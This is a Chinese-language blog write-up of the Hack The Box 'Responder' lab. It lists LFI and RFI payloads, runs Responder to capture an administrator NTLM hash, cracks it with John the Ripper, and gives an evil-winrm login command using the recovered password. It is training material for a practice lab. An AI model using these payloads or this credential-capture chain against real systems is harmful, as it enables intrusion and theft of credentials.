<!DOCTYPE html>
<html lang="zh-CN,en,zh-TW,default">
    <!-- title -->
<!-- keywords -->
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="DarkAP">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="DarkAP">
        <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    <meta name="description" content="欢迎你的到来，希望能对你有些许帮助">
    <meta name="description" content="OPENVPEN连接 nmap扫描端口  可以看到开放的端口80 访问一下80，跳转到域名为unika.htb的一个网页 修改&#x2F;etc&#x2F;hosts文件，添加 IP 和 域名   然后访问  第一问 使用ip访问，被重定向到什么域名	unika.htb 第二问 网站使用什么脚本语言生成	php 第三问 用于加载不同的语言的网页使用的是什么url 这里我们看到右上角有个EN 我们点">
<meta property="og:type" content="article">
<meta property="og:title" content="HTB-Labs(Resonder)">
<meta property="og:url" content="https://darkamp.github.io/2023/06/02/Responder/index.html">
<meta property="og:site_name" content="DarkAP">
<meta property="og:description" content="OPENVPEN连接 nmap扫描端口  可以看到开放的端口80 访问一下80，跳转到域名为unika.htb的一个网页 修改&#x2F;etc&#x2F;hosts文件，添加 IP 和 域名   然后访问  第一问 使用ip访问，被重定向到什么域名	unika.htb 第二问 网站使用什么脚本语言生成	php 第三问 用于加载不同的语言的网页使用的是什么url 这里我们看到右上角有个EN 我们点">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCEf0e89affa948e9b1ff3344a4bd93a530%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/WEBRESOURCEdc3915d57f03f2121158b3123145da1a%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCE6c857b860d730de291d93619179f4ca2%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCEcfd085a2fa28162d2bbcb85c00027417%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCE57255627dc325dddafff136408531c92%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCE9e8774c9ff87385a2cbca60a2fa74e50%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCEc3ba2f58dfcdedea289385b4d8aa8fbd%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCE7411e7a6ccaf30515fd9075c088ef371%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCE0309d89ff14849f9b44b701e568ba499%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCEef74ae6ebc2b8ce32b781ad49350124b%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCEc12d09a2d09834fc5e01bf6337714656%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCE91c73173f60802e8f517ea4cabe9713d%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCE25e832a44bc2cc9d8df0032b33cac050%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCEefa9134672247d785d8d1c72c098bcf9%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCE7e29612f743ff2b48eae2a412c4592bd%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCE431d4215ce8a4bdf5f50a05b979ddb9b%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCE6f50adca68a7e2497e58e53d3dff4371%E6%88%AA%E5%9B%BE.png">
<meta property="og:image" content="https://darkamp.github.io/images/WEBRESOURCEbc52d2ff555c35d81fbefdfb3e88a837%E6%88%AA%E5%9B%BE.png">
<meta property="article:published_time" content="2023-06-01T16:00:00.000Z">
<meta property="article:modified_time" content="2025-09-19T09:58:03.689Z">
<meta property="article:author" content="DarkAP">
<meta property="article:tag" content="HTB">
<meta property="article:tag" content="Lab">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://darkamp.github.io/images/WEBRESOURCEf0e89affa948e9b1ff3344a4bd93a530%E6%88%AA%E5%9B%BE.png">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <link rel="icon" href="/assets/02.ico">
    <title>HTB-Labs(Resonder) · DarkAP&#39;s Blog</title>
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
    (function (w) {
        'use strict'
        // rel=preload support test
        if (!w.loadCSS) {
            w.loadCSS = function () {}
        }
        // define on the loadCSS obj
        var rp = (loadCSS.relpreload = {})
        // rel=preload feature support test
        // runs once and returns a function for compat purposes
        rp.support = (function () {
            var ret
            try {
                ret = w.document.createElement('link').relList.supports('preload')
            } catch (e) {
                ret = false
            }
            return function () {
                return ret
            }
        })()

        // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
        // then change that media back to its intended value on load
        rp.bindMediaToggle = function (link) {
            // remember existing media attr for ultimate state, or default to 'all'
            var finalMedia = link.media || 'all'

            function enableStylesheet() {
                link.media = finalMedia
            }

            // bind load handlers to enable media
            if (link.addEventListener) {
                link.addEventListener('load', enableStylesheet)
            } else if (link.attachEvent) {
                link.attachEvent('onload', enableStylesheet)
            }

            // Set rel and non-applicable media type to start an async request
            // note: timeout allows this to happen async to let rendering continue in IE
            setTimeout(function () {
                link.rel = 'stylesheet'
                link.media = 'only x'
            })
            // also enable media after 3 seconds,
            // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
            setTimeout(enableStylesheet, 3000)
        }

        // loop through link elements in DOM
        rp.poly = function () {
            // double check this to prevent external calls from running
            if (rp.support()) {
                return
            }
            var links = w.document.getElementsByTagName('link')
            for (var i = 0; i < links.length; i++) {
                var link = links[i]
                // qualify links to those with rel=preload and as=style attrs
                if (
                    link.rel === 'preload' &&
                    link.getAttribute('as') === 'style' &&
                    !link.getAttribute('data-loadcss')
                ) {
                    // prevent rerunning on link
                    link.setAttribute('data-loadcss', true)
                    // bind listeners to toggle media back
                    rp.bindMediaToggle(link)
                }
            }
        }

        // if unsupported, run the polyfill
        if (!rp.support()) {
            // run once at least
            rp.poly()

            // rerun poly on an interval until onload
            var run = w.setInterval(rp.poly, 500)
            if (w.addEventListener) {
                w.addEventListener('load', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            } else if (w.attachEvent) {
                w.attachEvent('onload', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            }
        }

        // commonjs
        if (typeof exports !== 'undefined') {
            exports.loadCSS = loadCSS
        } else {
            w.loadCSS = loadCSS
        }
    })(typeof global !== 'undefined' ? global : this)
</script>

    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .footer-fixed-btn,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(
            -45deg,
            #444 0,
            #444 80px,
            #333 80px,
            #333 160px
        );
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }
</style>

    <link id="stylesheet-fancybox" rel="preload" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@5.0.36/dist/fancybox/fancybox.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link id="stylesheet-base" rel="preload" href="/css/style.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link id="stylesheet-mobile" rel="preload" href="/css/mobile.css" as="style" onload="this.onload=null;this.rel='stylesheet';this.media='screen and (max-width: 960px)'">
    <link id="stylesheet-theme-dark" rel="preload" href="/css/dark.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js" as="script">
    <link rel="preload" href="/font/Oswald-Regular.ttf" as="font" crossorigin>
    <link rel="preload" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" as="font" crossorigin>
    <!-- algolia -->
    <!-- 百度统计  -->
    <!-- 谷歌统计  -->
    <!-- Google tag (gtag.js) -->
<meta name="generator" content="Hexo 7.3.0"></head>

    <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ == undefined) {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js" />')
        }
    </script>
        <body class="post-body">
        <!-- header -->
        <header class="header header-mobile">
    <!-- top read progress line -->
    <div class="header-element">
        <div class="read-progress"></div>
    </div>
    <!-- sidebar menu button -->
    <div class="header-element">
        <div class="header-sidebar-menu">
            <div style="padding-left: 1px;">&#xe775;</div>
        </div>
    </div>
    <!-- header actions -->
    <div class="header-actions">
        <!-- theme mode switch button -->
        <span class="header-theme-btn header-element">
            <i class="fas fa-adjust"></i>
        </span>
        <!-- back to home page text -->
        <span class="home-link header-element">
            <a href="/">DarkAP's Blog</a>
        </span>
    </div>
    <!-- toggle banner -->
    <div class="banner">
        <div class="blog-title header-element">
            <a href="/">DarkAP&#39;s Blog</a>
        </div>
        <div class="post-title header-element">
            <a href="#" class="post-name">HTB-Labs(Resonder)</a>
        </div>
    </div>
</header>

        <!-- fixed footer -->
        <footer class="footer-fixed">
    <!-- donate button -->

    <!-- back to top button -->
    <div class="footer-fixed-btn footer-fixed-btn--hidden back-top">
        <div>&#xe639;</div>
    </div>
</footer>

        <!-- wrapper -->
        <div class="wrapper">
            <div class="site-intro" style="    height:50vh;
">
    <!-- 主页  -->
    <!-- 404页  -->
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
                HTB-Labs(Resonder)
            <!-- 404 -->
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            <!-- 404 -->
        </p>
        <!-- 文章页 meta -->
            <div class="post-intros">
                <!-- 文章页标签  -->
                    <div class="post-intro-tags" >
        <a class="post-tag" href="javascript:void(0);" data-tags="HTB">HTB</a>
        <a class="post-tag" href="javascript:void(0);" data-tags="Lab">Lab</a>
</div>

                <!-- 文章字数统计 -->
                    <div class="post-intro-read">
                        <span>Word count: <span class="post-count word-count">626</span>Reading time: <span class="post-count reading-time">2 min</span></span>
                    </div>
                <div class="post-intro-meta">
                    <!-- 撰写日期 -->
                    <span class="iconfont-archer post-intro-calander">&#xe676;</span>
                    <span class="post-intro-time">2023/06/02</span>
                    <!-- busuanzi -->
                        <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                            <span class="iconfont-archer post-intro-busuanzi">&#xe602;</span>
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    <!-- 文章分享 -->
                    <span class="share-wrapper">
                        <span class="iconfont-archer share-icon">&#xe71d;</span>
                        <span class="share-text">Share</span>
                        <ul class="share-list">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
    </div>
</div>

            <script>
  // get user agent
  function getBrowserVersions() {
    var u = window.navigator.userAgent
    return {
      userAgent: u,
      trident: u.indexOf('Trident') > -1, //IE内核
      presto: u.indexOf('Presto') > -1, //opera内核
      webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
      gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
      mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
      ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
      android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
      iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
      iPad: u.indexOf('iPad') > -1, //是否为iPad
      webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
      weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
      uc: u.indexOf('UCBrowser') > -1, //是否为android下的UC浏览器
    }
  }
  var browser = {
    versions: getBrowserVersions(),
  }
  console.log('userAgent: ' + browser.versions.userAgent)

  // callback
  function fontLoaded() {
    console.log('font loaded')
    if (document.getElementsByClassName('site-intro-meta')) {
      document
        .getElementsByClassName('intro-title')[0]
        .classList.add('intro-fade-in')
      document
        .getElementsByClassName('intro-subtitle')[0]
        .classList.add('intro-fade-in')
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in')
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb() {
    if (browser.versions.uc) {
      console.log('UCBrowser')
      fontLoaded()
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular'],
        },
        loading: function () {
          // 所有字体开始加载
          // console.log('font loading');
        },
        active: function () {
          // 所有字体已渲染
          fontLoaded()
        },
        inactive: function () {
          // 字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout')
          fontLoaded()
        },
        timeout: 5000, // Set the timeout to two seconds
      })
    }
  }

  function asyncErr() {
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0]
    o.src = u
    if (cb) {
      o.addEventListener(
        'load',
        function (e) {
          cb(null, e)
        },
        false
      )
    }
    if (err) {
      o.addEventListener(
        'error',
        function (e) {
          err(null, e)
        },
        false
      )
    }
    s.parentNode.insertBefore(o, s)
  }

  var asyncLoadWithFallBack = function (arr, success, reject) {
    var currReject = function () {
      reject()
      arr.shift()
      if (arr.length) async(arr[0], success, currReject)
    }

    async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack(
    [
      'https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js',
      'https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js',
      "/lib/webfontloader.min.js",
    ],
    asyncCb,
    asyncErr
  )
</script>

            <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" alt="loading">
            <div class="container container-unloaded">
                <main class="main post-page">
    <article class="article-entry">
        <p>OPENVPEN连接</p>
<p>nmap扫描端口</p>
<p><img src="/images/WEBRESOURCEf0e89affa948e9b1ff3344a4bd93a530%E6%88%AA%E5%9B%BE.png"></p>
<p>可以看到开放的端口80</p>
<p>访问一下80，跳转到域名为unika.htb的一个网页</p>
<p>修改&#x2F;etc&#x2F;hosts文件，添加 IP 和 域名 </p>
<p><img src="/WEBRESOURCEdc3915d57f03f2121158b3123145da1a%E6%88%AA%E5%9B%BE.png"></p>
<p>然后访问</p>
<p><img src="/images/WEBRESOURCE6c857b860d730de291d93619179f4ca2%E6%88%AA%E5%9B%BE.png"></p>
<h3 id="第一问"><a href="#第一问" class="headerlink" title="第一问"></a>第一问</h3><p><img src="/images/WEBRESOURCEcfd085a2fa28162d2bbcb85c00027417%E6%88%AA%E5%9B%BE.png"></p>
<p>使用ip访问，被重定向到什么域名	unika.htb</p>
<h3 id="第二问"><a href="#第二问" class="headerlink" title="第二问"></a>第二问</h3><p><img src="/images/WEBRESOURCE57255627dc325dddafff136408531c92%E6%88%AA%E5%9B%BE.png"></p>
<p>网站使用什么脚本语言生成	php</p>
<h3 id="第三问"><a href="#第三问" class="headerlink" title="第三问"></a>第三问</h3><p><img src="/images/WEBRESOURCE9e8774c9ff87385a2cbca60a2fa74e50%E6%88%AA%E5%9B%BE.png"></p>
<p>用于加载不同的语言的网页使用的是什么url</p>
<p>这里我们看到右上角有个EN 我们点击一下，查看url，发现有个page&#x3D;	加上回答框里有个e 盲猜是这个</p>
<p><img src="/images/WEBRESOURCEc3ba2f58dfcdedea289385b4d8aa8fbd%E6%88%AA%E5%9B%BE.png"></p>
<h3 id="第四和第五问"><a href="#第四和第五问" class="headerlink" title="第四和第五问"></a>第四和第五问</h3><p><img src="/images/WEBRESOURCE7411e7a6ccaf30515fd9075c088ef371%E6%88%AA%E5%9B%BE.png"></p>
<p>第四问是哪个是本地文件包含的exp	<strong>..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;windows&#x2F;system32&#x2F;drivers&#x2F;etc&#x2F;hosts</strong></p>
<p>第五问是哪个是远程文件包含的exp	<strong>&#x2F;&#x2F;10.10.14.6&#x2F;somefile</strong></p>
<h3 id="第六问"><a href="#第六问" class="headerlink" title="第六问"></a>第六问</h3><p><img src="/images/WEBRESOURCE0309d89ff14849f9b44b701e568ba499%E6%88%AA%E5%9B%BE.png"></p>
<p>NTLM的全称是什么，参考NTLM笔记</p>
<p>New Technology LAN Manager</p>
<h3 id="第七问"><a href="#第七问" class="headerlink" title="第七问"></a>第七问</h3><p><img src="/images/WEBRESOURCEef74ae6ebc2b8ce32b781ad49350124b%E6%88%AA%E5%9B%BE.png"></p>
<p>responder中的哪个参数能指定网络接口		-I</p>
<h3 id="第八问"><a href="#第八问" class="headerlink" title="第八问"></a>第八问</h3><p>有几个工具可以接受NetNTLMv 2质询&#x2F;响应，并尝试数百万个密码，以查看其中是否有任何密码生成相同的响应。一个这样的工具通常被称为“john”，但全名是什么？.</p>
<p><img src="/images/WEBRESOURCEc12d09a2d09834fc5e01bf6337714656%E6%88%AA%E5%9B%BE.png"></p>
<p>简单来说就是问爆破工具john的全称是什么	john the ripper</p>
<h3 id="第九问"><a href="#第九问" class="headerlink" title="第九问"></a>第九问</h3><p><img src="/images/WEBRESOURCE91c73173f60802e8f517ea4cabe9713d%E6%88%AA%E5%9B%BE.png"></p>
<p>管理员用户的密码是多少	badminton</p>
<p>首先启动responder并监听本地的tun0网卡，</p>
<p>然后由于靶机存在RFI，因此可以远程访问本地的某个文件，</p>
<p>使用responder拿到主机的administrator的哈希，然后使用john破解</p>
<p>使用responder监听本地tun0网卡	responder -I tun0</p>
<p><img src="/images/WEBRESOURCE25e832a44bc2cc9d8df0032b33cac050%E6%88%AA%E5%9B%BE.png"></p>
<p>靶机的地址访问本地的地址，注意访问的是本地的地址，就是openvpn获取到的地址</p>
<p><img src="/images/WEBRESOURCEefa9134672247d785d8d1c72c098bcf9%E6%88%AA%E5%9B%BE.png"></p>
<p>responder获取到了哈希</p>
<p><img src="/images/WEBRESOURCE7e29612f743ff2b48eae2a412c4592bd%E6%88%AA%E5%9B%BE.png"></p>
<p>保存到本地，使用john破解（时间非常久）</p>
<p><img src="/images/WEBRESOURCE431d4215ce8a4bdf5f50a05b979ddb9b%E6%88%AA%E5%9B%BE.png"></p>
<h3 id="第十一问"><a href="#第十一问" class="headerlink" title="第十一问"></a>第十一问</h3><p><img src="/images/WEBRESOURCE6f50adca68a7e2497e58e53d3dff4371%E6%88%AA%E5%9B%BE.png"></p>
<p>我们将使用Windows服务（即在机器上运行）使用我们恢复的密码远程访问响应者机器。它监听哪个TCP端口？</p>
<p>这句话我没明白，后来看提示说要用nmap</p>
<p>然后我就去扫了，扫的太慢了，于是就去看了wp，5985</p>
<p>然后用nmap扫这一个端口	总之是出来了</p>
<p><img src="/images/WEBRESOURCEbc52d2ff555c35d81fbefdfb3e88a837%E6%88%AA%E5%9B%BE.png"></p>
<h3 id="第十二问"><a href="#第十二问" class="headerlink" title="第十二问"></a>第十二问</h3><p>flag是什么</p>
<p>这边看别人的wp说要用一个叫evil-winrm的软件连接</p>
<p>evil-wimrm -i 10.129.212.141 -u Administrator -p badminton</p>
<p>由于我本机的kali连接不上去，就不做演示了</p>

    </article>
    <!-- license -->
        <div class="license-wrapper">
            <p>Author：<a href="https://DarkAmP.github.io">DarkAP</a>
            <p>Link：<a href="https://darkamp.github.io/2023/06/02/Responder/">https://darkamp.github.io/2023/06/02/Responder/</a>
            <p>Publish date：<a href="https://darkamp.github.io/2023/06/02/Responder/">June 2nd 2023, 12:00:00 am</a>
            <p>Update date：<a href="https://darkamp.github.io/2023/06/02/Responder/">September 19th 2025, 5:58:03 pm</a>
            <p>License：本文采用<a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    <!-- paginator -->
    <ul class="post-paginator">
        <li class="next">
                <div class="nextSlogan">Next Post</div>
                <a href="/2023/06/05/Three/" title="HTB-Labs(Three)">
                    <div class="nextTitle">HTB-Labs(Three)</div>
                </a>
        </li>
        <li class="previous">
                <div class="prevSlogan">Previous Post</div>
                <a href="/2023/05/24/Vulhub/SkyTower/" title="HTB-Labs(SkyTower)">
                    <div class="prevTitle">HTB-Labs(SkyTower)</div>
                </a>
        </li>
    </ul>
    <!-- comment -->
        <div class="post-comment">
            <!-- 来必力 City 版安装代码 -->

            
            
            
            <!-- utteranc评论 -->

            <!-- partial('_partial/comment/changyan') -->
            <!--PC版-->

            
            
            
        </div>
    <!-- timeliness note -->
    <!-- idea from: https://hexo.fluid-dev.com/posts/hexo-injector/#%E6%96%87%E7%AB%A0%E6%97%B6%E6%95%88%E6%80%A7%E6%8F%90%E7%A4%BA -->
    <!-- Mathjax -->
</main>

                <!-- profile -->
            </div>
            <footer class="footer footer-unloaded">
    <!-- social  -->
        <div class="social">
                            <a href="mailto:1085668417@qq.com" class="iconfont-archer email" title="email" ></a>
                <a href="//github.com/DarkAmP" class="iconfont-archer github" target="_blank" title="github"></a>
                <span class="iconfont-archer wechat" title="wechat">
                    <img class="profile-qr" src="/assets/example_qr.png" />
                </span>

        </div>
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- website approve for Chinese user -->
    <!-- 不蒜子  -->
        <div class="busuanzi-container">
                <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
        </div>
</footer>

        </div>
        <!-- toc -->
            <div class="toc-wrapper toc-wrapper-loding" style=    top:50vh;
>
                <div class="toc-catalog">
                    <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
                </div>
                <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%80%E9%97%AE"><span class="toc-number">1.</span> <span class="toc-text">第一问</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%BA%8C%E9%97%AE"><span class="toc-number">2.</span> <span class="toc-text">第二问</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%89%E9%97%AE"><span class="toc-number">3.</span> <span class="toc-text">第三问</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E5%9B%9B%E5%92%8C%E7%AC%AC%E4%BA%94%E9%97%AE"><span class="toc-number">4.</span> <span class="toc-text">第四和第五问</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E5%85%AD%E9%97%AE"><span class="toc-number">5.</span> <span class="toc-text">第六问</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%83%E9%97%AE"><span class="toc-number">6.</span> <span class="toc-text">第七问</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E5%85%AB%E9%97%AE"><span class="toc-number">7.</span> <span class="toc-text">第八问</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B9%9D%E9%97%AE"><span class="toc-number">8.</span> <span class="toc-text">第九问</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E5%8D%81%E4%B8%80%E9%97%AE"><span class="toc-number">9.</span> <span class="toc-text">第十一问</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E5%8D%81%E4%BA%8C%E9%97%AE"><span class="toc-number">10.</span> <span class="toc-text">第十二问</span></a></li></ol>
            </div>
        <!-- sidebar -->
        <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
        <div class="sidebar-panel-archives">
    <!-- 在 ejs 中将 archive 按照时间排序 -->
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
    <div class="total-and-search">
        <div class="total-archive">
        Total : 55
        </div>
        <!-- search  -->
    </div>
    <div class="post-archive">
            <div class="archive-year"> 2025 </div>
            <ul class="year-list">
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/PowerView/">PowerView</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/PsExec/">PsExec</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/Rubeus/">Rubeus</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/chisel--%E6%9C%AA%E5%AE%8C%E6%88%90/">chisel--未完成</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/rpcclient/">rpcclient</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/secretsdump.py/">secretsdump.py</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/smbclient/">smbclient</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/%E5%8D%B7%E5%BD%B1%E5%89%AF%E6%9C%AC/">卷影副本</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/%E5%9F%9F%E6%8E%A7%E5%88%B6%E5%99%A8%E5%B8%B8%E8%A7%81%E7%AB%AF%E5%8F%A3/">域控制器常见端口</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/%E5%9F%9F%E5%86%85%E6%BC%8F%E6%B4%9E%E5%92%8C%E5%88%A9%E7%94%A8/">域内漏洞和利用</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/%E5%9F%9F%E6%B8%97%E9%80%8F%E6%80%9D%E8%B7%AF/">域渗透思路</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/%E5%9F%9F%E5%86%85%E7%BC%A9%E5%86%99/">域内缩写</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/%E5%AF%86%E7%A0%81%E5%96%B7%E6%B4%92/">密码喷洒</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/">横向移动</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/%E5%A7%94%E6%B4%BE%E6%94%BB%E5%87%BB/">委派攻击</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
            <a class="archive-post-title" href="/2025/09/20/OSCP/%E6%9C%AC%E6%9C%BA%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91/">本机端口转发</a>
        </li>
        <li class="archive-post-item">
            <span class="archive-post-date">09/20</span>
